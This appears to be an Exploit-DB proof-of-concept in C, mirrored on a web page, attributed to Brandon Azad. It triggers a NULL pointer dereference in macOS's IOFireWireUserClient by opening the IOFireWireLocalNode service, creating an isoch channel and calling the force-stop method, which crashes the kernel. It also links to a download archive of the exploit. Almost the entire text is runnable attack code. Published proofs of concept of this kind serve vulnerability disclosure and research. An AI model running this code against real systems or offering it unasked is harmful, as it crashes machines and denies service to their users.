扫码分享
验证:
体验盒子/*
* IOFireWireFamily-null-deref.c
* Brandon Azad
*
* NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.
*
* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip
*/
#include <IOKit/IOKitLib.h>
int main() {
int ret = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOFireWireLocalNode"));
if (service == IO_OBJECT_NULL) {
ret = 1;
goto fail1;
}
io_connect_t connect;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
IOObjectRelease(service);
if (kr != KERN_SUCCESS) {
ret = 2;
goto fail1;
}
// isochChannel_Create
uint64_t args[3] = { 0, 0x100, 0x100 };
uint64_t handle = 0;
uint32_t output_count = 1;
kr = IOConnectCallMethod(connect, 57,
args, sizeof(args) / sizeof(*args), NULL, 0,
&handle, &output_count, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 3;
goto fail2;
}
// setAsyncRef_IsochChannelForceStop
kr = IOConnectCallMethod(connect, 90,
&handle, 1, NULL, 0,
NULL, NULL, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 4;
goto fail2;
}
fail2:
IOServiceClose(connect);
fail1:
return ret;
}
体验盒子
